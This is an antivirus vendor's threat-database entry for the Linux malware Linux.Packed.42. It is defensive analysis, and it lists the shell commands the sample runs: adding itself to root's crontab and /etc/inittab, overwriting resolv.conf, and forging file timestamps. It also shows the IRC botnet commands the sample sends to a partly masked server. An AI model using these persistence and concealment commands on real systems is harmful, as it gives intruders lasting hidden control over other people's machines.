Linux.Packed.42
Added to the Dr.Web virus database:
2017-11-27
Virus description added:
2017-11-27
Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /var/spool/cron/crontabs/root
- /etc/inittab
- /etc/rc.local
Malicious functions:
Launches itself as a daemon
Modifies router settings:
Launches processes:
- sh -c echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &
- sh -c chmod 700 <SAMPLE_FULL_PATH> > /dev/null 2>&1 &
- sh -c touch -acmr /bin/ls <SAMPLE_FULL_PATH>
- chmod 700 <SAMPLE_FULL_PATH>
- touch -acmr /bin/ls <SAMPLE_FULL_PATH>
- sh -c (crontab -l | grep -v \"<SAMPLE_FULL_PATH>\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00846930886) > /dev/null 2>&1
- crontab -l
- grep -v no cron
- grep -v <SAMPLE_FULL_PATH>
- grep -v lesshts/run.sh
- sh -c echo \"* * * * * <SAMPLE_FULL_PATH> > /dev/null 2>&1 &\" >> /var/run/.x00846930886
- sh -c crontab /var/run/.x00846930886
- crontab /var/run/.x00846930886
- sh -c rm -rf /var/run/.x00846930886
- rm -rf /var/run/.x00846930886
- sh -c cat /etc/inittab | grep -v \"<SAMPLE_FULL_PATH>\" > /etc/inittab2
- cat /etc/inittab
- sh -c echo \"0:2345:respawn:<SAMPLE_FULL_PATH>\" >> /etc/inittab2
- sh -c cat /etc/inittab2 > /etc/inittab
- cat /etc/inittab2
- sh -c rm -rf /etc/inittab2
- rm -rf /etc/inittab2
- sh -c touch -acmr /bin/ls /etc/inittab
- touch -acmr /bin/ls /etc/inittab
- sh -c /bin/uname -n
- sh -c nvram get router_name
- /bin/uname -n
Performs operations with the file system:
Modifies file access rights:
- <SAMPLE_FULL_PATH>
- /var/spool/cron/crontabs/tmp.NPlM0A
Creates or modifies files:
- /etc/resolv.conf
- /var/run/.x00846930886
- /run/.x00846930886
- /var/spool/cron/crontabs/tmp.NPlM0A
- /etc/inittab2
Deletes files:
- /var/run/.x00846930886
- /etc/inittab2
Network activity:
Awaits incoming connections on ports:
Connects to the following servers over the IRC protocol:
- Server: 12#.#28.171.44; Command: NICK x86|c|0|311633|unknown\nUSER x00 localhost localhost :1.0+tftp_jun112017\n
- Server: 12#.#28.171.44; Command: PONG :B4AA3007\n
- Server: 12#.#28.171.44; Command: MODE x86|c|0|311633|unknown -xi\n
- Server: 12#.#28.171.44; Command: MODE x86|c|0|311633|unknown +B\n
- Server: 12#.#28.171.44; Command: JOIN #m.x86 :777\n
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
このウェブサイトを継続して訪問する場合、訪問者に関する統計データを収集するためのCookieファイルおよび他のテクノロジーを弊社が利用することに同意したものとします。詳細